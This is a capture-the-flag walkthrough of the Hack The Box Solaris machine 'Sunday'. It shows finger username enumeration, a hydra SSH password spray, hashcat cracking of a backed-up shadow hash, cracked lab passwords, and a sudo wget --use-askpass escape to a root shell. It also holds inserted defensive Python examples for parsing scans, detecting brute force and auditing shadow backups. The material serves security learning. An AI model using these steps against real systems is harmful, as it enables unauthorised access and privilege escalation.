Sunday HTB

Solaris Machine

IP

10.10.10.76

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.76 | grep '^[0-9]' | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

79,111,515,6787,22022

Let's run a more in-depth scan of these ports

sudo nmap -sCV -p79,111,515,6787,22022 10.10.10.76 -oA nmap_results

results

PORT      STATE SERVICE VERSION
79/tcp    open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=12/19%Time=65814E2D%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x2
SF:0\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x
SF:20\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?
SF:\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where
SF:\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x2
SF:0\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x
SF:20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(S
SF:SLSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20
SF:\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x2
SF:0\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.47 seconds
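The scan above is saved with -oA, which also writes a greppable nmap_results.gnmap file next to the .nmap and .xml output. As an added example (not part of the original write-up), a small parser for that format, run over a constructed .gnmap sample that mirrors the results above, which produces the same comma-separated port spec the first one-liner builds by hand:

```python
# Constructed sample of the .gnmap file `nmap -oA nmap_results` writes
# (assumption: hand-written to match the greppable format; not the file from
# the original write-up). Each port entry has seven slash-separated fields:
# port/state/protocol/owner/service/rpc-info/version/
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Tue Dec 19 10:00:00 2023 as: nmap -sCV -p79,111,515,6787,22022 -oA nmap_results 10.10.10.76
Host: 10.10.10.76 ()\tStatus: Up
Host: 10.10.10.76 ()\tPorts: 79/open/tcp//finger?///, 111/open/tcp//rpcbind//2-4 (RPC #100000)/, 515/open/tcp//printer///, 6787/open/tcp//http//Apache httpd/, 22022/open/tcp//ssh//OpenSSH 8.4 (protocol 2.0)/\tIgnored State: closed (65530)
# Nmap done at Tue Dec 19 10:01:30 2023 -- 1 IP address (1 host up) scanned in 90.47 seconds
"""


def parse_gnmap(text):
    """Return {ip: [ {port, proto, state, service, version}, ... ]}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                       # "# Nmap ..." comment lines carry no data
        chunks = line.split("\t")          # "Host: ip (name)" then "Key: value" chunks
        ip = chunks[0].split(": ", 1)[1].split()[0]
        hosts.setdefault(ip, [])
        for chunk in chunks[1:]:
            key, _, value = chunk.partition(": ")
            if key != "Ports":
                continue                   # "Status: Up" / "Ignored State: ..." lines
            for entry in value.split(", "):
                parts = entry.split("/")
                if len(parts) < 7:
                    continue               # malformed entry, skip rather than crash
                port, state, proto, _owner, service, _rpc, version = parts[:7]
                hosts[ip].append({"port": int(port), "proto": proto, "state": state,
                                  "service": service, "version": version})
    return hosts


def open_ports(hosts, ip):
    """Sorted list of open port numbers for one host."""
    return sorted(p["port"] for p in hosts[ip] if p["state"] == "open")


def port_spec(hosts, ip):
    """The value you would hand to `nmap -p` for a follow-up scan."""
    return ",".join(str(p) for p in open_ports(hosts, ip))


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    print(port_spec(hosts, "10.10.10.76"))
    for p in hosts["10.10.10.76"]:
        print(p["port"], p["service"], p["version"] or "(no version)")
```

Parsing the saved file instead of re-scanning keeps the port list reproducible, and the per-port dicts are what you would feed into a tracking sheet or a later comparison scan.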

Finger running on port 79 looks interesting, let's start here

What is finger?

  • Finger is a network protocol used for querying information about users on a host or network

  • It typically runs on port 79

  • Essentially, when a finger client connects to a finger server, the client can request information on specific users

Okay, how can we attack this service?

  • If we can get a list of possible usernames, we can use finger to confirm which of them exist on the host

Okay, we don't have any possible usernames at the moment, meaning we need to find them. Let's check out the other services

HTTPS Port 6787

When we navigate to port 6787 in our browser we can see the following

I tried default credentials and none seemed to work, but the default credentials do seem to follow a single first name (jack, for example). Maybe we can create a list of common first names as usernames and enumerate them through finger

Enumerating usernames through finger

We can use the following tool (finger-user-enum)

and we will download the following usernames wordlist from git

Now let's enumerate usernames

sudo ./finger-user-enum.pl -U /opt/wordlist/usernames.txt -t 10.10.10.76

Looking through the output we can see a few names:

bin
daemon
ike
lp #printer
network
no
nobody
printer
program
remote
reserve
root
sammy
sunny
user
aiuser
user

Since sammy and sunny look like the most likely human accounts, let's go with these

Now I tried to log in via the Solaris login page with some common passwords but none were successful, so let's move on to password spraying via SSH

Let's create a file (usernames) containing both sunny and sammy

Now let's password spray SSH on port 22022

hydra -f -P /usr/share/wordlists/rockyou.txt -L usernames 10.10.10.76 ssh -s 22022

We find a password for the user sunny

sunny sunday

  • these creds also work for the Solaris login page

ssh sunny@10.10.10.76 -p 22022

We now have a shell on the system
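From the defender's side, the hydra run above leaves a very recognisable trail in sshd's auth log: a burst of failed password logins from one source cycling through the usernames file, followed by an accepted login for sunny. As an added example (not part of the original write-up), a small detector for exactly that pattern, run over constructed sshd syslog lines; the log lines, the host name, the threshold of 5 failures and the 5-minute window are all assumptions chosen for the demo:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of sshd syslog lines (assumption: hand-written to resemble
# OpenSSH password auth logging; not logs taken from the target box).
# 10.10.14.5 mimics hydra cycling through sammy/sunny until sunny's password
# hits; 10.10.14.9 is an ordinary user who mistypes once and then logs in.
SAMPLE_AUTH_LOG = """\
Dec 19 10:00:01 sunday sshd[1201]: Failed password for sammy from 10.10.14.5 port 51201 ssh2
Dec 19 10:00:02 sunday sshd[1202]: Failed password for sunny from 10.10.14.5 port 51202 ssh2
Dec 19 10:00:03 sunday sshd[1203]: Failed password for sammy from 10.10.14.5 port 51203 ssh2
Dec 19 10:00:04 sunday sshd[1204]: Failed password for sunny from 10.10.14.5 port 51204 ssh2
Dec 19 10:00:05 sunday sshd[1205]: Failed password for sammy from 10.10.14.5 port 51205 ssh2
Dec 19 10:00:06 sunday sshd[1206]: Failed password for sunny from 10.10.14.5 port 51206 ssh2
Dec 19 10:00:07 sunday sshd[1207]: Failed password for sammy from 10.10.14.5 port 51207 ssh2
Dec 19 10:00:08 sunday sshd[1208]: Failed password for sunny from 10.10.14.5 port 51208 ssh2
Dec 19 10:00:09 sunday sshd[1209]: Accepted password for sunny from 10.10.14.5 port 51209 ssh2
Dec 19 10:01:00 sunday sshd[1210]: Failed password for sunny from 10.10.14.9 port 40001 ssh2
Dec 19 10:01:05 sunday sshd[1211]: Accepted password for sunny from 10.10.14.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2"
)

FAIL_THRESHOLD = 5              # failures from one source that count as a burst
WINDOW = timedelta(minutes=5)   # failures older than this are forgotten


def parse_events(text):
    """Yield {ts, result, user, src} for every password-auth line in the log."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # pubkey logins, disconnects etc. are not auth results
        ts = datetime.strptime(re.sub(r"\s+", " ", m["ts"]), "%b %d %H:%M:%S")
        yield {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(text, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return alerts: 'burst' when one source reaches `threshold` failures inside
    `window`, and 'success-after-burst' when a login from that source then
    succeeds, which is what a cracked password looks like in the log."""
    recent = defaultdict(list)  # src -> failed events still inside the window
    alerts = []
    for ev in sorted(parse_events(text), key=lambda e: e["ts"]):
        hist = recent[ev["src"]]
        hist[:] = [e for e in hist if ev["ts"] - e["ts"] <= window]
        if ev["result"] == "Failed":
            hist.append(ev)
            if len(hist) == threshold:          # fire once per burst
                alerts.append({"type": "burst", "src": ev["src"], "at": ev["ts"],
                               "users": sorted({e["user"] for e in hist})})
        elif len(hist) >= threshold:            # Accepted right after a burst
            alerts.append({"type": "success-after-burst", "src": ev["src"],
                           "user": ev["user"], "failures": len(hist), "at": ev["ts"]})
            hist.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The single failure from 10.10.14.9 stays below the threshold, so only the hydra-style source produces alerts; the "success-after-burst" alert is the one worth paging on, since it means a guessed password worked.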

Priv Esc via sunny

checking our sudo privs

sudo -l

sudo -l shows we can run a program called troll. I tried to run it but don't understand what it is actually doing; it could be interesting, so keep it in mind, we will revisit it later

Let's see if we can find any files with the SUID bit set

find / -perm -u=s -type f 2>/dev/null

  • Nothing interesting

When we look in /backup we find a backup of the shadow file

Let's see if we can crack sammy's hash and whether the password is still in use

  • Notice the $5$ prefix of the hash; this tells us it is sha256crypt (hashcat mode 7400)

hashcat -m 7400 sammyhash /usr/share/wordlists/rockyou.txt

and we find the password

sammy cooldude!
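The question the write-up asks here, whether a hash from an old backup is still in use, is also the question an auditor asks when a shadow backup turns up world-readable. As an added example (not part of the original write-up), a small checker that classifies each shadow password field by its crypt(3) prefix, maps it to the hashcat mode you would need, and reports accounts whose backup hash is byte-identical to the live one; the two shadow files are constructed with placeholder hashes and are not the real contents of /backup on the target:

```python
# Constructed sample shadow files (assumption: placeholder salts and hash bodies,
# not the real hashes from /backup on the target). Field layout:
# name:password:lastchg:min:max:warn:inactive:expire:flag
# Solaris-style "NP" (no password) and "*LK*" (locked) entries are included
# because they must be skipped, not cracked.
BACKUP_SHADOW = """\
root:$5$rootsalt$0000000000000000000000000000000000000000000:17460::::::
sunny:$5$sunnysalt$1111111111111111111111111111111111111111111:17460::::::
sammy:$5$sammysalt$2222222222222222222222222222222222222222222:17460::::::
lp:NP:6445::::::
nobody:*LK*:6445::::::
"""

# In the live file sunny's password was rotated (new scheme, new salt, new
# lastchg); root and sammy still carry exactly the hashes in the backup.
CURRENT_SHADOW = """\
root:$5$rootsalt$0000000000000000000000000000000000000000000:17460::::::
sunny:$6$newsalt$3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333:19710::::::
sammy:$5$sammysalt$2222222222222222222222222222222222222222222:17460::::::
lp:NP:6445::::::
nobody:*LK*:6445::::::
"""

# crypt(3) scheme identifiers and the matching hashcat -m modes
SCHEMES = {
    "$1$": ("md5crypt", 500),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
}


def crypt_scheme(field):
    """Classify a shadow password field -> (scheme name, hashcat mode or None)."""
    if field in ("", "NP", "*NP*"):
        return ("no-password", None)
    if field.startswith(("*", "!")):       # *LK*, !, !! : locked or never set
        return ("locked", None)
    for prefix, info in SCHEMES.items():
        if field.startswith(prefix):
            return info
    return ("unknown", None)


def parse_shadow(text):
    """Map user -> (password field, lastchg in days since epoch or None)."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            continue                        # not a shadow record
        lastchg = int(fields[2]) if fields[2].isdigit() else None
        entries[fields[0]] = (fields[1], lastchg)
    return entries


def still_valid_in_backup(backup_text, current_text):
    """Accounts whose crackable hash in the backup is identical to the live
    shadow entry: a password cracked from the backup still works today."""
    backup, current = parse_shadow(backup_text), parse_shadow(current_text)
    exposed = []
    for user, (field, _) in backup.items():
        name, mode = crypt_scheme(field)
        if mode is None:
            continue                        # nothing to crack for NP / locked
        if user in current and current[user][0] == field:
            exposed.append((user, name, mode))
    return exposed


if __name__ == "__main__":
    for user, name, mode in still_valid_in_backup(BACKUP_SHADOW, CURRENT_SHADOW):
        print(f"{user}: {name} (hashcat -m {mode}) unchanged since backup")
```

Run against a real backup and the live /etc/shadow, the output is the list of accounts that need a forced password change (and the hashcat mode tells you how cheap the cracking is); for the box above, sammy's sha256crypt hash falling to rockyou.txt is exactly the case this flags.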

We can switch user to sammy

su sammy

When we check our sudo privileges we can see the following

If we check the wget entry, we can see we can break out of our current shell and gain a root shell

TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sudo wget --use-askpass=$TF 0

We are now root
